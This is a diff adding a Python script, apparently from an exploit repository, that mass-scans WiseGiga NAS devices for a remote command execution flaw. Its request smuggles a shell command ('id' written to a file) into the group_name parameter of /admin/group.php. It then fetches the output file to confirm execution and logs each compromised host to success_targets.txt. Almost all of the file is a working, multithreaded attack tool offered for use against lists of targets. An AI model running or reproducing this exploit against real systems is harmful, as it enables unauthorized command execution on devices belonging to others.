|
| 1 | +# 作者: VulnExpo |
| 2 | +# 日期: 2023-11-17 |
| 3 | + |
| 4 | +import requests |
| 5 | +import argparse |
| 6 | +import threading |
| 7 | +import httplib2 |
| 8 | +import random |
| 9 | +import re |
| 10 | +import string |
| 11 | +requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning) |
| 12 | + |
| 13 | +def check_for_vulnerability(url, proxies=None, success_file=None): |
| 14 | + try: |
| 15 | + headers = { |
| 16 | + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36', |
| 17 | + } |
| 18 | + paths = ['/admin/group.php?memberid=root&cmd=add&group_name=d;id>1.txt', '/admin/1.txt'] |
| 19 | + |
| 20 | + for path in paths: |
| 21 | + target_url = url + path |
| 22 | + response = requests.get(target_url, headers=headers, timeout=10, verify=False) |
| 23 | + |
| 24 | + if response.status_code == 200 and "window.open" in response.text: |
| 25 | + response2 = requests.get(url + paths[1], headers=headers, timeout=10, verify=False) |
| 26 | + if response2.status_code == 200 and "uid=" in response2.text: |
| 27 | + print(f"目标URL: {url}") |
| 28 | + with open(success_file, 'a') as s_file: |
| 29 | + s_file.write(f"++++++++++++++++++\n") |
| 30 | + s_file.write(f"目标URL: {url}\n") |
| 31 | + s_file.write(f"响应内容: {response2.text}\n\n") |
| 32 | + return True |
| 33 | + |
| 34 | + except Exception as e: |
| 35 | + print(f"发生异常:{e}") |
| 36 | + |
| 37 | + return False |
| 38 | + |
| 39 | +def scan_targets(targets, proxies=None, success_file=None): |
| 40 | + for target in targets: |
| 41 | + target = target.strip() |
| 42 | + check_for_vulnerability(target, proxies, success_file) |
| 43 | + |
| 44 | +def multi_threaded_scan(urls, proxies=None, success_file=None, num_threads=4): |
| 45 | + threads = [] |
| 46 | + |
| 47 | + for i in range(num_threads): |
| 48 | + thread = threading.Thread(target=scan_targets, args=(urls[i::num_threads], proxies, success_file)) |
| 49 | + threads.append(thread) |
| 50 | + |
| 51 | + for thread in threads: |
| 52 | + thread.start() |
| 53 | + |
| 54 | + for thread in threads: |
| 55 | + thread.join() |
| 56 | + |
| 57 | +if __name__ == '__main__': |
| 58 | + parser = argparse.ArgumentParser(description="WiseGiga NAS远程命令执行漏洞") |
| 59 | + parser.add_argument("-u", "--url", help="目标URL") |
| 60 | + parser.add_argument("-f", "--file", default="url.txt", help="目标URL列表,默认为url.txt") |
| 61 | + parser.add_argument("-t", "--threads", type=int, default=4, help="线程数,默认为4") |
| 62 | + parser.add_argument("-p", "--proxy", help="代理服务器地址(例如:http://localhost:8080)") |
| 63 | + args = parser.parse_args() |
| 64 | + |
| 65 | + if not args.url and not args.file: |
| 66 | + print("请使用 -u 指定要扫描的目标URL或使用默认文件 url.txt。") |
| 67 | + exit(1) |
| 68 | + |
| 69 | + if args.url: |
| 70 | + urls = [args.url] |
| 71 | + elif args.file: |
| 72 | + with open(args.file, 'r') as file: |
| 73 | + urls = file.readlines() |
| 74 | + |
| 75 | + success_file = 'success_targets.txt' |
| 76 | + |
| 77 | + proxies = { |
| 78 | + "http": args.proxy, |
| 79 | + "https": args.proxy |
| 80 | + } if args.proxy else None |
| 81 | + |
| 82 | + multi_threaded_scan(urls, proxies, success_file, args.threads) |
| 83 | + |
| 84 | + print("扫描完成,成功的目标已保存到 success_targets.txt 文件中。") |
0 commit comments